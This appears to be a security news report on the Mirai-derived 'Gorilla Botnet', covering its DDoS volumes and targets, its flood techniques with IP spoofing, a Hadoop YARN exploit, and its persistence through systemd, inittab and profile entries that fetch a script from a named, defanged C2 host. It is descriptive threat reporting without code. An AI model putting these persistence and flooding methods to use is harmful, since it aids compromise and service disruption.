A new member of the malware family has been discovered by security researchers. It is believed to be a variant of the leaked Mirai botnet source code and is named Gorilla Botnet, aka GorillaBot. The CyberSecurity firm NSFOCUS discovered approximately 300000 attack commands being issued by the botnet between the attack window of 4th to 27th September.
An average of 20,000 DDOS mounting commands were observed to have been issued by the botnet every day over a period of 23 days. Though the target of the botnet was not any specific organization or country, this huge density DDOS was launched to spread across 100 countries, targeting their banks, universities, telecom vendors, etc. Countries that were attacked the most during this window include the US, China, Canada and Germany.
To conduct these DDoS attacks, Gorilla Botnet leverages UDP, ACK BYPASS, VSE (Valve Source Engine), SYN, and ACK floods, exploiting the UDP protocol’s connectionless nature. By combining these techniques and UDP’s lack of connection-based reliability, the Gorilla Botnet amplifies the volume of traffic directed at the target, utilizing arbitrary source IP spoofing. The botnet supports multiple CPU architectures such as ARM, MIPS, x86_64, and x86 and has the capability to connect with one of its five predefined command-and-control (C2) servers to await DDoS commands.
The botnet also hunts to exploit Apache Hadoop YARN RPC vulnerability to achieve remote code execution and achievespersistence by creating a service file named “custom.service” in the “/etc/systemd/system/” directory and configuring it to run automatically at system startup. The service downloads and executes a shell script (“lol.sh”) from a remote server (“pen.gorillafirewall[.]su”). Similar commands are also added to “/etc/inittab,” “/etc/profile,” and “/boot/bootcmd” files to download and run the shell script upon system startup or user login.
The botnet employs multiple technologies to maintain persistence for a long time, which makes it challenging to employ any countermeasures.
